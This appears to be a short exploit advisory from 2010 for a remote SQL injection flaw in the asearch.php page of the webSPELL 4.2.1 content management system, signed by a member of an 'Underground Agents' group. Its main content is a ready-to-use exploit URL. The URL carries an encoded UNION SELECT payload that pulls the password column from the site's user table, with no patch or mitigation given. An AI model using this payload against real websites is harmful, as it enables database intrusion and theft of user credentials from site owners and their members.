webSPELL version 4.2.1 suffers from a remote SQL injection vulnerability in asearch.php.
0163ec03c6ae338856b27c1e38b3dd4ece2457d03c702cc8bbdfbf427709007c
################# INFORMATION ##################################################
+Name : webspell 4.2.1 asearch.php SQL Injection Vulnerability
+Author : silent vapor
+Date : 29.09.2010
+Script : webspell 4.2.1
+Price : free
+Language :PHP
+Discovered by silent vapor
+Underground Agents
+Greetz to Team-Internet, 4004-Security-Project, Easy Laster
################################################################################
+Vulnerability : https://localhost/webspell/asearch.php?site=search&table=user&
column=nickname&exact=true&identifier=userID&searchtemp=search_user&search=
+Exploitable : https://localhost/webspell/asearch.php?site=search&table=user&
column=nickname&exact=true&identifier=userID&searchtemp=search_user&search=
admin%2527%20UNION+/**/+SELECT%201,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM
%20ws_2lu_user%20WHERE%20%25271%2527=%25271
################################################################################